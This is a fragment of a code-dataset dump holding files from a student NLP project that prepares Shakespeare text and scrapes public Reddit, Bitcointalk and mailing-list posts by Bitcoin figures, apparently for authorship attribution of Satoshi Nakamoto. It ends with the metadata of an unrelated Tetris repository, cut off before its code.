"alphanum_fraction": 0.5259605646133423,
"avg_line_length": 38.28571319580078,
"blob_id": "915d299959483bd82fbdd0d7789372274956e891",
"content_id": "686ca2e6b192b852b30a5d9955378359471a5a30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1926,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 49,
"path": "/data/shakespeare/generate_data.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport json\nfrom keras.preprocessing import text\nimport random\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"raw_metadata\")\n parser.add_argument(\"out_filename\", default=\"sp.data\")\n # if chunk size is 0, just take line by line\n parser.add_argument(\"--chunk_size\", type=int, default=0)\n args = parser.parse_args()\n\n metadata = None\n with open(args.raw_metadata, 'r') as f:\n metadata = json.load(f)\n\n output = []\n for w in metadata[\"works\"]:\n print(\"processing\", w[\"title\"] + \"....\", end=\"\", flush=True)\n with open(w[\"filename\"], 'r') as f:\n if args.chunk_size == 0: # line by line\n output += [(s.strip(), w[\"author\"], w[\"id\"]) for s in f.readlines()]\n else:\n alllines = \"\\n\".join([s.strip() for s in f.readlines()])\n words_list = text.text_to_word_sequence(alllines)\n while len(words_list) >= args.chunk_size:\n output.append((\" \".join(words_list[:args.chunk_size]), w[\"author\"], w[\"id\"]))\n words_list = words_list[args.chunk_size:]\n output.append((\" \".join(words_list), w[\"author\"], w[\"id\"]))\n '''\n alllines = [s.strip() for s in f.readlines()]\n while len(alllines) >= args.chunk_size:\n output.append((\" \".join(alllines[:args.chunk_size]), w[\"author\"], w[\"id\"]))\n alllines = alllines[args.chunk_size:]\n output.append((\" \".join(alllines), w[\"author\"], w[\"id\"]))\n '''\n\n print(\"done.\", flush=True)\n\n random.shuffle(output)\n\n with open(args.out_filename, 'w+') as f:\n f.write(\"// Metadata\\n\")\n f.write(json.dumps(metadata) + \"\\n\\n\")\n f.write(\"// (sentence, author_id, work_id)\\n\")\n for o in output:\n f.write(str(o) + \"\\n\")\n\n"
},
{
"alpha_fraction": 0.5307262539863586,
"alphanum_fraction": 0.7094972133636475,
"avg_line_length": 16.899999618530273,
"blob_id": "76dce793a10d0a71db5aecae6484e72d00869e39",
"content_id": "fad0a47692845df0d8c5022f2fae112569c850f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 179,
"license_type": "no_license",
"max_line_length": 21,
"num_lines": 10,
"path": "/data/satoshi/requirements.txt",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "html2text==2018.1.9\nmercury-parserpy==0.4\npraw==5.3.0\npy-backwards==0.7\npyquery==1.4.0\nrequests==2.18.4\nrequests-html==0.6.6\npython-dotenv==0.8.2\npython-slugify==1.2.4\nclick==6.7\n"
},
{
"alpha_fraction": 0.6512096524238586,
"alphanum_fraction": 0.6542338728904724,
"avg_line_length": 30,
"blob_id": "bed01a5de7a201b70e5adb8b4bc3e1468eab6015",
"content_id": "0583a58d3e3b3c29c86a3c22d503b1a25daf8cdd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 992,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 32,
"path": "/data/satoshi/download-reddit-user.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import argparse\nimport praw\nimport os\n\nfrom slugify import slugify\nfrom itertools import filterfalse\nfrom dotenv import load_dotenv, find_dotenv\n\ndef process_comment(source):\n lines = source.splitlines()\n lines = filterfalse(lambda x: x.startswith('>'), lines)\n return '\\n'.join(lines)\n\nif __name__ == \"__main__\":\n load_dotenv(find_dotenv())\n parser = argparse.ArgumentParser()\n parser.add_argument('user', help='The Reddit user')\n args = parser.parse_args()\n\n r = praw.Reddit(client_id=os.environ['REDDIT_CLIENT_ID'],\n client_secret=os.environ['REDDIT_CLIENT_SECRET'],\n user_agent='Reddit User Scraper (/u/varunramesh)')\n\n user = r.redditor(args.user)\n count = 0\n for comment in user.comments.new(limit=None):\n url = 'https://reddit.com' + comment.permalink\n with open(slugify(url) + \".txt\", \"wb\") as f:\n f.write(process_comment(comment.body).encode('utf8'))\n count += 1\n\n print(count, \"posts downloaded...\")\n"
},
{
"alpha_fraction": 0.5865224599838257,
"alphanum_fraction": 0.5948419570922852,
"avg_line_length": 26.31818199157715,
"blob_id": "fb73cb909a64137c08810f44fc0889cbade6dc43",
"content_id": "30fe23435b6fb69608213ba4a14d5f3da8bf5e39",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1202,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 44,
"path": "/data/satoshi/download-bitcoin-talk.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import html2text\nimport argparse\nimport time\n\nfrom requests_html import HTMLSession\nfrom slugify import slugify\nfrom pyquery import PyQuery as pq\n\ndef process_post(post_html):\n post = pq(post_html)\n post.remove('div.quoteheader')\n post.remove('div.quote')\n return post.html(method='html')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument('url', help='The Profile url.')\n args = parser.parse_args()\n\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n session = HTMLSession()\n\n cursor = 0\n while True:\n url = args.url + ';sa=showPosts;start=' + str(cursor)\n print(\"Crawling\", url)\n r = session.get(url)\n td = r.html.find('#bodyarea td', first=True)\n posts = td.find('table[cellpadding=\"0\"]')\n\n for post in posts:\n url = post.find('.middletext a')[-1].attrs['href']\n content = post.find('.post', first=True).html\n with open(slugify(url) + \".txt\", \"wb\") as f:\n f.write(h.handle(process_post(content)).encode('utf8'))\n\n cursor += len(posts)\n\n time.sleep(5)\n if len(posts) < 20:\n break\n"
},
{
"alpha_fraction": 0.6360177397727966,
"alphanum_fraction": 0.6391883492469788,
"avg_line_length": 39.43589782714844,
"blob_id": "962892a1f4f6bf95101a88825972f42f0c2d9473",
"content_id": "064db23d8850a2cb109e2edfec1f2cf701d4b6bb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1577,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 39,
"path": "/data/satoshi/download-satoshi.py",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "import requests\nimport html2text\n\nfrom itertools import filterfalse\nfrom pyquery import PyQuery as pq\n\ndef process_email(email):\n lines = email.splitlines()\n\n lines = filterfalse(lambda x: x == 'Satoshi Nakamoto' or x == 'Satoshi', lines)\n lines = filterfalse(lambda x: x == '---------------------------------------------------------------------', lines)\n lines = filterfalse(lambda x: x == 'The Cryptography Mailing List', lines)\n lines = filterfalse(lambda x: x.startswith('Unsubscribe by sending \"unsubscribe cryptography\" to'), lines)\n\n lines = filterfalse(lambda x: x.startswith('>'), lines)\n lines = filterfalse(lambda x: x.endswith('wrote:'), lines)\n return '\\n'.join(lines)\n\ndef process_post(post_html):\n post = pq(post_html)\n post.remove('div.quoteheader')\n post.remove('div.quote')\n return post.html(method='html')\n\nif __name__ == \"__main__\":\n h = html2text.HTML2Text()\n h.ignore_links = True\n h.ignore_images = True\n\n emails = requests.get('https://raw.githubusercontent.com/NakamotoInstitute/nakamotoinstitute.org/master/data/satoshiemails.json').json()\n\n for i, email in enumerate(emails['emails']):\n with open(\"email-%d.txt\" % i, \"wb\") as f:\n f.write(process_email(email['Text']).encode('utf8'))\n\n posts = requests.get('https://raw.githubusercontent.com/NakamotoInstitute/nakamotoinstitute.org/master/data/satoshiposts.json').json()\n for i, post in enumerate(posts['posts']):\n with open(\"post-%d.txt\" % i, \"wb\") as f:\n f.write(h.handle(process_post(post['post'])).encode('utf8'))\n"
},
{
"alpha_fraction": 0.6431095600128174,
"alphanum_fraction": 0.6908127069473267,
"avg_line_length": 33.632652282714844,
"blob_id": "37d6f852884564d1e9761473a358d9054859e299",
"content_id": "b6722f4481bbdaf71c9b2ce08e058b6a09ebc098",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1698,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 49,
"path": "/data/satoshi/README.md",
"repo_name": "jlwatson/cs224n-project",
"src_encoding": "UTF-8",
"text": "Gavin Andresen\n- [x] http://gavinandresen.ninja/feed\n- [x] http://feeds.feedburner.com/Gavinthink\n- [x] https://bitcointalk.org/index.php?action=profile;u=224\n- [x] https://www.reddit.com/user/gavinandresen\n- [ ] https://twitter.com/gavinandresen\n\nRoger Ver\n- [x] https://bitcointalk.org/index.php?action=profile;u=10310\n- [x] https://www.reddit.com/user/MemoryDealers/\n- [ ] https://twitter.com/rogerkver\n\nHal Finney\n- [x] https://bitcointalk.org/index.php?action=profile;u=2436\n- [x] https://web.archive.org/web/20140403012916/finney.org/~hal/\n- [x] http://nakamotoinstitute.org/finney/\n- [x] Cypherpunks Mailing List - `Hal <[email protected]>`, `Hal <[email protected]>`, `Hal Finney <[email protected]>`\n- [ ] https://twitter.com/halfin\n\nJed McCaleb\n- [x] https://bitcointalk.org/index.php?action=profile;u=5322\n- [x] https://www.reddit.com/user/Swamp12\n- [x] https://news.ycombinator.com/user?id=swamp12\n- [ ] https://twitter.com/JedMcCaleb\n\nNick Szabo\n- [x] https://unenumerated.blogspot.com/feeds/posts/default\n- [x] https://web.archive.org/web/20160930093313/http://szabo.best.vwh.net/\n- [x] Cypherpunks Mailing List - `[email protected] (Nick Szabo)`\n- [ ] https://twitter.com/NickSzabo4\n\nCraig Steven Wright\n- [x] https://web.archive.org/web/20160502071722/http://www.drcraigwright.net/\n- [x] https://www.reddit.com/user/Craig_S_Wright\n- [ ] https://theconversation.com/profiles/craig-s-wright-3334/\n- [ ] https://web.archive.org/web/20120316093712/http://gse-compliance.blogspot.com/\n\nDorian Nakamoto\n- [x] https://www.reddit.com/user/DSPNakamoto\n\nDavid Mazieres\n- [x] https://news.ycombinator.com/user?id=mazieres\n- [x] Cypherpunks Mailing List - `David Mazieres <[email protected]>`, `David Mazieres <[email protected]>`\n\nWei Dai\n- [x] http://lesswrong.com/user/Wei_Dai/\n\nMicheal Clear\n- [ ] http://ciphron.netsoc.ie/\n"
}
] | 16 |
khost95/SSIP-2020-Project-Butterfly | https://github.com/khost95/SSIP-2020-Project-Butterfly | 85efd86d8ebfd8d50b2d3cbab3af1fbacda31bc4 | 3f2b72f8d6da0f3252c77e15f552d26c4a8b7816 | 0111d4b818138b4e4532b92c21ed2eeba79afac0 | refs/heads/master | 2022-11-21T04:55:08.166188 | 2020-07-17T10:39:27 | 2020-07-17T10:39:27 | 280,361,998 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8068965673446655,
"alphanum_fraction": 0.8206896781921387,
"avg_line_length": 142,
"blob_id": "47cd7b723b70edaf61d257697803e12a40a0a382",
"content_id": "bc3818c30297b2f04565c2ea4ea168169b45638b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 145,
"license_type": "no_license",
"max_line_length": 142,
"num_lines": 1,
"path": "/Butterfly_Classification/ReadME.txt",
"repo_name": "khost95/SSIP-2020-Project-Butterfly",
"src_encoding": "UTF-8",
"text": "The dataset used,the weights and the script you can find on https://drive.google.com/file/d/1gFkZxYTcmYICyMcNseNYLahLLw6fCyYQ/view?usp=sharing \r\n"
},
{
"alpha_fraction": 0.7682926654815674,
"alphanum_fraction": 0.8170731663703918,
"avg_line_length": 161,
"blob_id": "f2728ed8dd8729328265b8f9c750bad3638c38aa",
"content_id": "df2889cf70aef8906153343b6120c31e0c322b93",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 164,
"license_type": "no_license",
"max_line_length": 161,
"num_lines": 1,
"path": "/Created_datasets/ReadMe.txt",
"repo_name": "khost95/SSIP-2020-Project-Butterfly",
"src_encoding": "UTF-8",
"text": "The created datasets: background images, synthset1, synthset2, you can find on https://drive.google.com/file/d/1cdKRS4H70frrthp8dCwI_WGQPvy1RSRS/view?usp=sharing \r\n"
},
{
"alpha_fraction": 0.7436061501502991,
"alphanum_fraction": 0.7448849081993103,
"avg_line_length": 33.75555419921875,
"blob_id": "25ea5af5cd1c0bfed82f75371c59df1ce41d11f7",
"content_id": "55bd069a6d3cdd803b8d56de685990d59b123d09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1564,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 45,
"path": "/Azure_results/butterfly.py",
"repo_name": "khost95/SSIP-2020-Project-Butterfly",
"src_encoding": "UTF-8",
"text": "# Libraries for processing pictures\nimport os\nimport sys\nimport requests\nimport json\nimport pathlib\n\n# Check Microsoft Azure settings\nif 'COMPUTER_VISION_SUBSCRIPTION_KEY' in os.environ:\n subscription_key = os.environ['COMPUTER_VISION_SUBSCRIPTION_KEY']\nelse:\n print(\"\\nSet the COMPUTER_VISION_SUBSCRIPTION_KEY environment variable.\\n**Restart your shell or IDE for changes to take effect.**\")\n sys.exit()\n\nif 'COMPUTER_VISION_ENDPOINT' in os.environ:\n endpoint = os.environ['COMPUTER_VISION_ENDPOINT']\n\nanalyze_url = endpoint + \"vision/v3.0/analyze\"\n\n\n# Which folder to check\nmyFolder = pathlib.Path('process')\n# Search pattern for PNG pictures\nmyPattern = \"*.png\"\n\nfor myFile in myFolder.glob(myPattern):\n\tmyReport = str(myFile) + '.txt'\n\tprint('Processing: ' + str(myFile) + ' report: ' + myReport)\n\t# Read file into variable image_data, read options: binary\n\tmyPicture = open(myFile, \"rb\")\n\timage_data = myPicture.read()\n\tmyPicture.close()\n\t# Setup HTTP headers\n\theaders = {'Ocp-Apim-Subscription-Key': subscription_key,'Content-Type':'application/octet-stream'}\n\tparams = {'visualFeatures': 'Objects'}\n\tresponse = requests.post(analyze_url, headers=headers, params=params, data=image_data)\n\tresponse.raise_for_status()\n\t# The 'analysis' object contains various fields that describe the image. The most\n\t# relevant caption for the image is obtained from the 'description' property.\n\tanalysis = response.json()\n\t# Save all report into text file\n\tmySaveFile = open(myReport, 'w')\n\tjson.dump(analysis, mySaveFile)\n\tmySaveFile.close()\n\tprint(analysis)\n"
}
] | 3 |
aprilgom/cmtvser | https://github.com/aprilgom/cmtvser | 34613ecd8eb69829957ed000fa0a5efbdb2db9d2 | d431d3a3f7f1c4d05c673fd249ec812f456fe4e7 | 4e1e70bce748aa1b40cd803fe4f0b59210b7a452 | refs/heads/master | 2021-07-07T08:28:31.609975 | 2021-02-08T23:15:06 | 2021-02-08T23:15:06 | 226,097,313 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.7142857313156128,
"alphanum_fraction": 0.7142857313156128,
"avg_line_length": 13,
"blob_id": "354fc8b155d68d0b1f9cb14b21dc47b993e01b18",
"content_id": "1864913dafc4f162fcedb38911a66d772884335b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 76,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 3,
"path": "/README.md",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "# cmtvser\n셀레니움 유튜브 댓글 수집,\nkonlpy로 형태소 분석.\n"
},
{
"alpha_fraction": 0.7293532490730286,
"alphanum_fraction": 0.7492537498474121,
"avg_line_length": 32.5,
"blob_id": "f7628e36ef17af5e772ca9d5bd238f8fa402a2b3",
"content_id": "24286bb4e79926fd1acee435db89a5b868f1c26a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2010,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 60,
"path": "/comment_crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom os import path\n\ndef naver(url):\n\n\toptions = webdriver.ChromeOptions()\n\n\toptions.add_argument('headless')\n\t#options.add_argument('window-size=1920x1080')\n\t#options.add_argument(\"disable-gpu\")\n\n\toptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n\toptions.add_argument(\"lang=ko_KR\")\n\n\tchromedriver = path.expandvars(r'%LOCALAPPDATA%\\Programs\\Python\\chromedriver.exe')\n\tdriver = webdriver.Chrome(chromedriver,chrome_options=options)\n\tdriver.get(url)\n\t\n\ttry:\n\t\tdriver.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div/a[1]').click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\ttry:\n\t\tview_com_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'u_cbox_btn_view_comment')))\n\t\tview_com_btn.click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\tis_see_more = True\n\tsee_more_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#cbox_module > div > div.u_cbox_paginate > a')))\n\twhile is_see_more:\n\t\ttry:\n\n\t\t\tsee_more_btn.click()\n\n\t\texcept NoSuchElementException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementNotInteractableException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementClickInterceptedException as e:\n\t\t\tprint('exception',e)\n\n\tres = driver.find_elements_by_class_name('u_cbox_contents')\n\tret = []\n\tfor cmts in res:\n\t ret.append(cmts.text)\n\tdriver.close()\n\t#res = driver.find_element_by_xpath('.//*[@class=\\\"u_cbox_contents\\\"]')\n\n\treturn ret\n\n#\n"
},
{
"alpha_fraction": 0.7126718759536743,
"alphanum_fraction": 0.7391945123672485,
"avg_line_length": 34.71929931640625,
"blob_id": "78d0d03bcccf39b0693a5b82628485a6ee3f52f9",
"content_id": "9715c78f6793bacf19871b447ae36bf6e1c24a9d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2042,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 57,
"path": "/sele_comment_crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom os import path\n\n\noptions = webdriver.ChromeOptions()\n\noptions.add_argument('headless')\n#options.add_argument('window-size=1920x1080')\n#options.add_argument(\"disable-gpu\")\n\noptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\noptions.add_argument(\"lang=ko_KR\") # 한국어!\n\nchromedriver = path.expandvars(r'%LOCALAPPDATA%\\Programs\\Python\\chromedriver.exe')\ndriver = webdriver.Chrome(chromedriver,chrome_options=options)\nurl = \"\"\n\ndriver.get(\"https://news.naver.com/main/ranking/popularDay.nhn?rankingType=popular_day§ionId=100&date=20191030\")\n\ndriver.find_element_by_xpath('//*[@id=\"wrap\"]/table/tbody/tr/td[2]/div/div[4]/ol/li[1]/div[2]/div[1]/a').click()\n\ndriver.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div/a[1]').click()\n\nis_see_more = True\nsee_more_button = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#cbox_module > div > div.u_cbox_paginate > a')))\nwhile is_see_more:\n try:\n\n see_more_button.click()\n\n except NoSuchElementException as e:\n print('exception',e)\n is_see_more = False\n except ElementNotInteractableException as e:\n print('exception',e)\n is_see_more = False\n except ElementClickInterceptedException as e:\n print('exception',e)\n\nres = driver.find_elements_by_class_name('u_cbox_contents')\n#res = driver.find_element_by_xpath('.//*[@class=\\\"u_cbox_contents\\\"]')\nfor com in res:\n print(com.text)\n#f = open(\"comments_naver.txt\",'w')\n#f.write(res.text);\n#f.close();\n\n\n\n#driver.close()\n"
},
{
"alpha_fraction": 0.6959937214851379,
"alphanum_fraction": 0.7124902009963989,
"avg_line_length": 31.227848052978516,
"blob_id": "1c73d9a67831c97f4803b06cf2c037185ea6d862",
"content_id": "d74e8da03cb4c44d85d8ed68dc197a86b4ea10cb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2546,
"license_type": "no_license",
"max_line_length": 157,
"num_lines": 79,
"path": "/crawl_linux.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "from requests import get\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import ElementNotInteractableException\nfrom selenium.common.exceptions import ElementClickInterceptedException\nfrom os import path\ndef cr_sele_init():\n global driver\n\toptions = webdriver.ChromeOptions()\n\n\toptions.add_argument('headless')\n\t#options.add_argument('window-size=1920x1080')\n\t#options.add_argument(\"disable-gpu\")\n\n\toptions.add_argument(\"user-agent=Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\")\n\toptions.add_argument(\"lang=ko_KR\")\n\n\tchromedriver = path.expandvars('./chromedriver')\n\tdriver = webdriver.Chrome(chromedriver,chrome_options=options)\n\ndef cr_NaverNewsCmt(url): \n global driver\n\tdriver.get(url)\n\n\ttry:\n\t\tdriver.find_element_by_xpath('//*[@id=\"cbox_module\"]/div/div/a[1]').click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\ttry:\n\t\tview_com_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CLASS_NAME, 'u_cbox_btn_view_comment')))\n\t\tview_com_btn.click()\n\texcept Exception as e:\n\t\tprint('exception',e)\n\tis_see_more = True\n\tsee_more_btn = WebDriverWait(driver, 10).until(EC.presence_of_element_located((By.CSS_SELECTOR, '#cbox_module > div > div.u_cbox_paginate > a')))\n\twhile is_see_more:\n\t\ttry:\n\n\t\t\tsee_more_btn.click()\n\n\t\texcept NoSuchElementException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementNotInteractableException as e:\n\t\t\tprint('exception',e)\n\t\t\tis_see_more = False\n\t\texcept ElementClickInterceptedException as e:\n\t\t\tprint('exception',e)\n\n\tres = driver.find_elements_by_class_name('u_cbox_contents')\n\tret = []\n\tfor cmts in res:\n\t ret.append(cmts.text)\n\t#res = driver.find_element_by_xpath('.//*[@class=\\\"u_cbox_contents\\\"]')\n\n\treturn ret\n\ndef cr_DaumNewsCmt(url): \n global driver\n driver.get(url)\n is_see_more = True \n \n while is_see_more:\n \ttry:\n \t driver.find_element_by_css_selector('#alex-area > div > div > div > div.cmt_box > div.alex_more > a')\n \texcept Exception as e:\n \t print('exception',e)\n \t is_see_more = False\n res = driver.find_elements_by_class_name('desc_txt font_size_17') \n ret = []\n for cmts in res:\n ret.append(cmts.text)\n return ret \n\ndef cr_sele_close():\n driver.close()\n"
},
{
"alpha_fraction": 0.6445086598396301,
"alphanum_fraction": 0.736994206905365,
"avg_line_length": 33.599998474121094,
"blob_id": "f96aeef2b138dda740b0648a9276c8781ce46507",
"content_id": "1605aa9b2bfbe5120c83d24933fedbd41bad6825",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 346,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 10,
"path": "/crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "import crawl_linux as comcr\n\n\ncomments = comcr.cr_NaverNewsCmt(\"https://news.naver.com/main/ranking/read.nhn?mid=etc&sid1=111&rankingType=popular_day&oid=215&aid=0000819819&date=20191029&type=1&rankingSeq=2&rankingSectionId=100\")\ncomcr.cr_sele_close()\nf = open(\"comments.txt\",'w',-1,\"utf-8\")\nfor cmt in comments:\n f.write(cmt+\"\\n\")\n\nf.close()\n"
},
{
"alpha_fraction": 0.5790753960609436,
"alphanum_fraction": 0.5936739444732666,
"avg_line_length": 20.578947067260742,
"blob_id": "eb0541ca9ee43f93c996e244289ead538cc4e160",
"content_id": "e282e216077986ebe48c38e6b7036772d93c70de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 411,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 19,
"path": "/hyeongtae.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "\nfrom konlpy.tag import Komoran\n\ndef hyeongtae(filename):\n\ttokenizer = Komoran()\n\ttok_comments = []\n\tf = open(filename+\".txt\",'r+',-1,\"utf-8\")\n\n\tcomments = f.read().splitlines()\n\tf.close()\n\tg = open(\"tok\"+filename+\".txt\",'w',-1,\"utf-8\")\n\tfor com in comments:\n\t\ttok_com_l = tokenizer.morphs(com)\n\t\ti = 0\n\t\tfor tok in tok_com_l:\n\t\t\tg.write(tok)\n\t\t\ti+=1\n\t\t\tif i != len(tok_com_l):\n\t\t\t\tg.write(\" \")\n\t\tg.write(\"\\n\")\n"
},
{
"alpha_fraction": 0.6650164723396301,
"alphanum_fraction": 0.6864686608314514,
"avg_line_length": 20.64285659790039,
"blob_id": "834f75731d4dcde27dd644f94efdd21d51da8072",
"content_id": "e6ebc2c1e7cde5b29aab7c2ab2a4d1050e347d66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 606,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 28,
"path": "/article_comment_crawl.py",
"repo_name": "aprilgom/cmtvser",
"src_encoding": "UTF-8",
"text": "import requests\nfrom requests import get\nfrom bs4 import BeautifulSoup\n\nreq = requests.get('https://news.naver.com/main/ranking/popularDay.nhn?rankingType=popular_day§ionId=100&date=20191029')\nhtml = req.text\nreq.close()\nif req.ok:\n print('ok')\nelse:\n print('failed')\n\nsoup = BeautifulSoup(html,'html.parser')\n\nrankings_list = soup.select(\n 'div.ranking_headline'\n)\nprint(ranking_list)\n\n\nf = open(\"a.html\",'w')\nf.write(html)\nf.close()\ndef download(url):\n file_name = url.split('/')[-1]\n with open(file_name,\"wb\") as file:\n response = get(url)\n file.write(response.content)\n"
}
] | 7 |
zhrmrz/max_prod | https://github.com/zhrmrz/max_prod | 6894b7c1ac584764f8030c01f21e099a58918852 | 630da8a256f69ba65c959555011e500a0e15df03 | f11743eeafc0185e935db903623c4dfa2a953e84 | refs/heads/master | 2022-09-11T17:24:13.400119 | 2020-05-30T19:55:37 | 2020-05-30T19:55:37 | 268,149,888 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.36571428179740906,
"alphanum_fraction": 0.4285714328289032,
"avg_line_length": 29.882352828979492,
"blob_id": "add93ee3d7db4fc723e4993f8b1ffe102dde2747",
"content_id": "f49674cbb53be0319dc4941d91a041843654c832",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "no_license",
"max_line_length": 83,
"num_lines": 17,
"path": "/max_prod.py",
"repo_name": "zhrmrz/max_prod",
"src_encoding": "UTF-8",
"text": "class Sol:\n def max_prod(self,arr):\n s_arr=sorted(arr)\n if (s_arr[0]>=0):\n return s_arr[-1]*s_arr[-2]*s_arr[-3]\n elif s_arr[1]>=0:\n return s_arr[-1] * s_arr[-2] * s_arr[-3]\n elif s_arr[-1]<0:\n return s_arr[0] * s_arr[1] * s_arr[2]\n elif s_arr[-1]==0:\n return 0\n else:\n return max(s_arr[-1]*s_arr[-2]*s_arr[-3],s_arr[0] * s_arr[1]*s_arr[-1])\n\nif __name__ == '__main__':\n p=Sol()\n print(p.max_prod([1,4,8,2,-10,-9,-11]))\n"
}
] | 1 |
Ruben9922/sh-tetrominoes-game | https://github.com/Ruben9922/sh-tetrominoes-game | 0d48f8d3a5e7c26f787011a0662fca92d46bad5c | c0c77021543fb695c926e7c363128ba981bc1b9e | 008d334aca023f5207dca89356cdb410e4d6add7 | refs/heads/master | 2021-01-13T14:58:56.629694 | 2018-06-21T15:09:30 | 2018-06-21T15:09:30 | 76,651,779 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.49685534834861755,
"alphanum_fraction": 0.5263960361480713,
"avg_line_length": 28.312849044799805,
"blob_id": "9c02b0f3a49257232a3d9ce3ab5e31b4b20f7249",
"content_id": "6fbcee2298718d2a92877e6c6a7e6cd667742b5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5247,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 179,
"path": "/tetrominoes-game.py",
"repo_name": "Ruben9922/sh-tetrominoes-game",
"src_encoding": "UTF-8",
